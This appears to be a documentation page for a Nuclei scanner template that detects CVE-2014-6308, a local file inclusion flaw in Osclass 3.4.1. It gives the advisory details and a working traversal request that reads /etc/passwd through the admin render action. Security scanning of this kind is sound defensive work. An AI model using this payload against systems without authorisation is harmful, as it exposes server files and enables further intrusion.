Osclass Security Advisory 3.4.1 - Local File Inclusion
ID: CVE-2014-6308
Severity: medium
Author: daffainfo
Tags: cve2014,cve,lfi,packetstorm,osclass
Description
Section titled “Description”A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.
YAML Source
Section titled “YAML Source”id: CVE-2014-6308
info: name: Osclass Security Advisory 3.4.1 - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php. impact: | An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade to a patched version of Osclass (3.4.2 or later) to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2014-6308 - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435 - https://www.netsparker.com/lfi-vulnerability-in-osclass/ - http://blog.osclass.org/2014/09/15/osclass-3-4-2-ready-download/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.0922 epss-percentile: 0.94654 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: osclass product: osclass tags: cve2014,cve,lfi,packetstorm,osclass
http: - method: GET path: - "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a004730450220693acd1e2e8056010af8fba52e9ce83a354dbc3549d4e813087668e707c4ef4f022100f231542ca77bf4c2765f197a3690c98d4554fdd2d36dce09cf5b62eda527baa0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-6308.yaml"